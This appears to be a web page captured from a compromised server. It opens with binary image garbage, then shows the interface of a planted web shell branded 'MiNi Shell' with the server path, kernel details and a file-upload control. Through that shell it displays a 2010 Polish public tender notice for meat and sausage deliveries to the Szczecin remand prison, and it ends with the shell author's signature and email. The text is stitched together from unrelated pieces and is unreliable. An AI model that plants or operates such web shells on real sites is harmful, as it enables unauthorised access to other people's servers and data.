JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100305/61776-N-2010.html

<p class="kh_header"><b>Szczecin: Dostawa mięsa i wędlin do Aresztu Śledczego w Szczecinie.</b><br>
<b>Numer ogłoszenia: 61776 - 2010; data zamieszczenia: 05.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Kaszubska 28, 70-952 Szczecin, woj. zachodniopomorskie, tel. 091 4809100, 4809151, 52, faks 091 4809260.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mięsa i wędlin do Aresztu Śledczego w Szczecinie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet I:
Mięso, wędliny i podroby drobiowe:
mięso mielone drobiowe (świeże, pakowane w opakowania foliowe hermetycznie zamknięte)- 1300kg, CPV 15112220-4, PN-A-82011;
korpusy drobiowe (świeże) - 700kg, CPV 15112210-1, PN-A-86524;
kurczak udko małe, ze skórą (część uda bez pałki, świeży) - 1200kg, CPV 15112210-1, PN-A-86524;
kurczak piersi bez skóry (świeży) - 250kg, CPV 15112210-1, PN-A-86524;
mięso gulaszowe drobiowe (świeże) - 1000kg, CPV 15112200-8, PN-A-86524;
indyk piersi bez skóry (świeży) - 250kg, CPV 15112210-1, PN-A-86524;
kiełbasa mortadela drobiowa (homogenizowana, bez widocznych oznak tłuszczu, lekko wyczuwalny smak przypraw, wyczuwalny smak mięsa drobiowego) - 2200kg, CPV 15131135-0, PN-A-86526;
serdelki drobiowe (homogenizowane, osłonka z folii, bez widocznych oznak tłuszczu, lekko wyczuwalny smak przypraw, wyczuwalny smak mięsa drobiowego) - 2000kg, CPV 15131135-0, PN-A-86526;
pieczeń drobiowa (wyrób w postaci bloku, zapieczony, średnio tłusty) - 1600kg, CPV 15131135-0, PN-A-86526;
kiełbasa szynkowa z indyka (bez widocznych oznak tłuszczu, na przekroju widoczne grube kawałki chudego mięsa drobiowego, wyczuwalny smak mięsa drobiowego) - 1000kg, CPV 15131135-0, PN-A-86526;
mielonka drobiowa (drobno rozdrobniona, bez widocznych oznak tłuszczu, wyczuwalny smak mięsa drobiowego)  - 3500kg, CPV 15131135-0, PN-A-86526;
pasztet z indyka (wyrób w osłonce sztucznej lub jelitowej, średnio tłusta, w kształcie batoników po 200g) - 800kg, CPV 15131310-1, PN-A-86526;
wątróbki drobiowe (świeże) - 800kg, CPV 15112300-9, PN-A-86523;
polędwica z indyka (bez widocznych oznak tłuszczu, na przekroju w przewadze widoczne grube kawałki chudego mięsa drobiowego, wyczuwalny smak mięsa drobiowego) - 300kg, CPV 15131135-0, PN-A-86526;
kiełbasa mazurska z indyka (średnio rozdrobniona, osłonka z jelita cienkiego wieprzowego, z widocznymi na przekroju drobnymi kawałkami mięsa, wyczuwalny smak mięsa i przypraw) - 1200kg, CPV 15131135-0, PN-A-86526;
kurczak cały (świeży) - 1000kg, CPV 15112210-1, PN-A-86524;
parówki z kurczaka (homogenizowane, osłonka z jelita cienkiego, bez widocznych oznak tłuszczu, lekko wyczuwalny smak przypraw, wyczuwalny smak mięsa drobiowego) - 1500kg, CPV 15131135-0, PN-A-86526.


Pakiet II:

Mięso, wędliny, podroby wieprzowe i wołowe:
mięso mielone wieprzowo - wołowe (świeże, pakowane w opakowania foliowe hermetycznie zamknięte) - 1700kg, CPV 15113000-3, PN-A-82011;
karkówka wieprzowa (bez kości, świeża) - 200kg, CPV 15113000-3, PN-86/A-82002;
mięso gulaszowe wieprzowe (świeże) - 1600kg, CPV 15113000-3, PN-A-82011;
mięso wieprzowe schab (bez kości, świeże) - 600kg, CPV 15113000-3, PN-86/A-82002;
mięso wołowe extra (bez kości, świeże) - 300kg, CPV 15111100-0, PN-88/A-82003;
kości spożywcze (wieprzowe świeże) - 2000kg, CPV 15100000-9, PN-76/A-85712;
żeberka wieprzowe (paski, świeże) - 900kg, CPV 15113000-3, PN-86/A-82002;
kości wędzone spożywcze (wieprzowe)- 1500kg,  CPV 15113000-3, PN-A-82007;
smalec - 1000kg, CPV 15412100-0, PN-90/A-85802;
słonina wieprzowa (świeża) - 400kg, CPV 15412100-0, PN-86/A-82004;
wątroba wieprzowa (świeża) - 400kg, CPV 15114000-0, PN-86/A-82004;
flaki wołowe krojone (obgotowane) - 200kg, 15131600-1; PN-86/A-82004,
kaszanka (z kaszy gryczanej lub jęczmiennej, w sztucznej osłonce lub naturalnym jelicie wieprzowym) - 700kg, CPV 15131134-3, PN-86/A-82004;
salceson włoski (biały, wyrób podrobowy, z widocznymi kawałkami mięsa) - 600kg, CPV 15114000-0, PN-86/A-82004;
salceson ozorkowy (czarny, wyrób podrobowy, z widocznymi kawałkami ozorów i mięsa) - 600kg, CPV 15114000-0, PN-86/A-82004;
kiełbasa zwyczajna (średnio rozdrobniona, bez widocznych oznak tłuszczu, wyczuwalny smak i zapach mięsa i przypraw) - 8000kg, CPV 15131130-5, PN-A-82007;
kiełbasa parówkowa (homogenizowana, wieprzowa, osłonka z jelita cienkiego, średnio tłusta)  - 1500kg, CPV 15131130-5, PN-A-82007;
kiełbasa mortadela z papryką (homogenizowana, bez widocznych oznak tłuszczu, wyczuwalny smak przypraw, wyczuwalny smak mięsa) - 2000kg, CPV 15131130-5, PN-A-82007;
metka cebulowa (wyrób w osłonce sztucznej, w kształcie batoników po 200g) - 1000kg, CPV 15131130-5, PN-A-82007;
parówki cielęce (homogenizowane, wędzone, w osłonce naturalnej, bez widocznych oznak tłuszczu) - 1200kg, CPV 15131130-5, PN-A-82007;
mielonka tyrolska (drobno rozdrobniona, lekko widoczne oznaki tłuszczu, wyczuwalny smak mięsa) - 2100kg, CPV 15131130-5, PN-A-82007;
kiełbasa wiejska (średnio rozdrobniona, z widocznymi na przekroju średnimi kawałkami mięsa, lekko wyczuwalny smak przypraw)  - 2200kg, CPV 15131130-5, PN-A-82007;
kiełbasa biała parzona (średnio rozdrobniona, w osłonce naturalnej) - 1700kg, CPV 15131130-5, PN-A-82007;
kiełbasa podwawelska (średnio rozdrobniona, podsuszana, z widocznymi na przekroju średnimi kawałkami mięsa, lekko wyczuwalny smak przypraw)  - 800kg, CPV 15131130-5, PN-A-82007;
kiełbasa zielonogórska (średnio rozdrobniona, osłonka z jelita cienkiego wieprzowego lub sztuczna, z widocznymi na przekroju drobnymi kawałkami mięsa) - 3300kg, CPV 15131130-5, PN-A-82007;
kiełbasa toruńska (średnio rozdrobniona, osłonka z jelita cienkiego wieprzowego, z widocznymi na przekroju drobnymi kawałkami mięsa) - 2400kg, CPV 15131130-5, PN-A-82007;
kiełbasa tatrzańska (średnio rozdrobniona, osłonka z jelita cienkiego wieprzowego, z widocznymi na przekroju drobnymi kawałkami mięsa) - 2000kg, CPV 15131130-5, PN-A-82007;
parówki śląskie (homogenizowane, osłonka z folii, bez widocznych oznak tłuszczu, lekko wyczuwalny smak przypraw, wyczuwalny smak mięsa)  - 1500kg, CPV 15131130-5, PN-A-82007;
kiełbasa serdelowa (homogenizowana, bez widocznych oznak tłuszczu, wyczuwalny smak przypraw, wyczuwalny smak mięsa) - 2000kg, CPV 15131130-5, PN-A-82007;
kiełbasa serwolatka (homogenizowana, bez widocznych oznak tłuszczu, wyczuwalny smak przypraw, wyczuwalny smak mięsa) - 1000kg, CPV 15131130-5, PN-A-82007.

Pakiet III:

Konserwy mięsne:
przysmak śniadaniowy (konserwa  w puszce o gramaturze 300g, mielonka wysokowydajna) - 450 kg, CPV 15131000-5, PN-A-82022:1998;
konserwa turystyczna (konserwa  w puszce o gramaturze 300g, mielonka wysokowydajna) - 450 kg, CPV 15131000-5, PN-A-82022:1998;1.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.11.22.20-4, 15.11.22.10-1, 15.11.30.00-3, 15.13.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia  /nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy
ul. Kaszubska 28
70-952 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2010 godzina 10:00, miejsce: siedziba zamawiającego:
Areszt Śledczy
ul. Kaszubska 28
70-952 Szczecin
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com